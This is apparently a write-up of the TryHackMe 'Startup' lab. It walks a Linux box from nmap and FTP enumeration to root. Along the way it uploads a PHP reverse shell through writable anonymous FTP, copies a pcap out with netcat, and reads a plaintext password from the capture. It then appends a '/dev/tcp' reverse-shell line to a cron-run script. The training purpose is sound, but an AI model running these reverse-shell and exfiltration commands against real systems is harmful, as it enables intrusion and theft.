# Startup

![tryhackme.com - © TryHackMe](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-b2e002eade8dde2278b2f87e7fe1aef9362cddda%2Ftryhackme-logo-small.png?alt=media)

***

## Intro

| Room Info            | ![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-09d7b5dbac78c58c7b74721476ee6617c8b73086%2Fstartup.png?alt=media) |
| -------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| 🔗 Name              | [Startup](https://tryhackme.com/room/startup)                                                                                                                                                          |
| 🎯 Target IP         | `10.10.173.77`                                                                                                                                                                                         |
| 📈 Difficulty level  | 🟢Easy                                                                                                                                                                                                 |
| 💲 Subscription type | Free                                                                                                                                                                                                   |
| 🐧 OS                | Linux                                                                                                                                                                                                  |

***

## Recon

```bash
su
echo "10.10.173.77 startup.thm" >> /etc/hosts

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
```

Start Reconnaissance

```bash
mkdir thm/startup
cd thm/startup
nmap startup.thm
    21/tcp open  ftp
    22/tcp open  ssh
    80/tcp open  http

nmap -sV -sC -Pn -oA startup startup.thm
```

```bash
21/tcp open  ftp  vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.18.65.48
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
22/tcp open  ssh  OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b9a60b841d2201a401304843612bab94 (RSA)
|   256 ec13258c182036e6ce910e1626eba2be (ECDSA)
|_  256 a2ff2a7281aaa29f55a4dc9223e6b43f (ED25519)
80/tcp open  http  Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Enumerate Web server directories

```bash
gobuster dir -u http://startup.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
```

```bash
/files (Status: 301) [Size: 310] [--> http://startup.thm/files/]
```

Navigate to

* `http://startup.thm/files/`

![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-218c60c18667f5111f472b4456022f678d1bfaef%2Fimage-20230515143244492.png?alt=media)

Login via FTP with `anonymous`:`anonymous`. The files in the folder are the ones from the `/files` webpage.

```bash
ftp startup.thm

ls
```

![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-aa9bc2e74ff55de86e6a4201e8f959c54034075e%2Fimage-20230515143526046.png?alt=media)

***

## Exploitation

Get a Reverse shell by uploading a `PHP` file via FTP and run it through the web page.

```bash
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
# Set $ip & $port
$ip = '10.18.65.48';
$port = 1234;

mv php-reverse-shell.php shell.php
```

```bash
# In the FTP anonymous session
cd ftp
put shell.php
```

```bash
nc -nvlp 1234
```

* Navigate to `http://startup.thm/files/ftp/shell.php` to get a reverse shell

![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-f67b476ad50cdded054c8ced64b0e5e35018b5f7%2Fimage-20230515145419274.png?alt=media)

```bash
/usr/bin/script -qc /bin/bash /dev/null

ls
cat recipe.txt

ls -lah /home
	lennie

ls /incidents
	suspicious.pcapng

cp /incidents/suspicious.pcapng /var/www/html/files/smb
# Permissions denied
```

![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-a764ec139714fbbe94e08b225aee7f2e81879cbd%2Fimage-20230515151802211.png?alt=media)

Transfer `suspicious.pcapng` using `netcat`

```bash
# Kali
nc -nvlp 5555 > susp.pcap

# Startup box
nc -nv 10.18.65.48 5555 < /incidents/suspicious.pcapng
```

Analyze the `susp.pcap` file in Wireshark or use the `strings` command

```bash
strings susp.pcap
```

![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-293f024e16d370192a48fb785113c715ecfcd2b7%2Fimage-20230515152948262.png?alt=media)

Try the string as password for `lennie` user.

```bash
su lennie
# password: c4ntg3t3n0ughsp1c3
# It works
```

> 📌 `lennie`:`c4ntg3t3n0ughsp1c3`

* 🚩 Get `user.txt`

```bash
find / -type f -iname user.txt 2>/dev/null
cat /home/lennie/user.txt
THM{0********************************
```

Close the reverse shell and connect via SSH

```bash
ssh lennie@startup.thm
```

Perform some Enumeration with `lennie` user

```bash
ls -lah *
    -rw-r--r-- 1 lennie lennie   38 Nov 12  2020 user.txt
    
    Documents:
    total 20K
    drwxr-xr-x 2 lennie lennie 4.0K Nov 12  2020 .
    drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
    -rw-r--r-- 1 root   root    139 Nov 12  2020 concern.txt
    -rw-r--r-- 1 root   root     47 Nov 12  2020 list.txt
    -rw-r--r-- 1 root   root    101 Nov 12  2020 note.txt
    
    scripts:
    total 16K
    drwxr-xr-x 2 root   root   4.0K Nov 12  2020 .
    drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
    -rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh
    -rw-r--r-- 1 root   root      1 May 15 13:38 startup_list.txt

cat scripts/*
cat Documents/*
cat /etc/print.sh
ls -lah /etc/print.sh
	-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh
```

![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-831bdfe0efd5d2d6142f81640fceb1d21daea97d%2Fimage-20230515154046856.png?alt=media)

***

## Privilege Escalation

Since `planner.sh` will be run as root (with a cron job), and it contains the `/etc/print.sh` command script, modify `/etc/print.sh` and input a payload (a reverse shell for example) into it to run it as `root`.

```bash
echo "/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1" >> /etc/print.sh
```

Wait for the reverse shell on the attacker machine. The root will run the `planner.sh` script once a minute.

```bash
# Kali
nc -nvlp 3333
```

![](https://1099202751-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEhofjMfYbx3gOUSReXD7%2Fuploads%2Fgit-blob-df1f624567a22d693b7682ebab352fe82f3571e4%2Fimage-20230515155056052.png?alt=media)

```bash
find / -type f -iname root.txt 2>/dev/null
cat /root/root.txt
THM{f********************************
```

***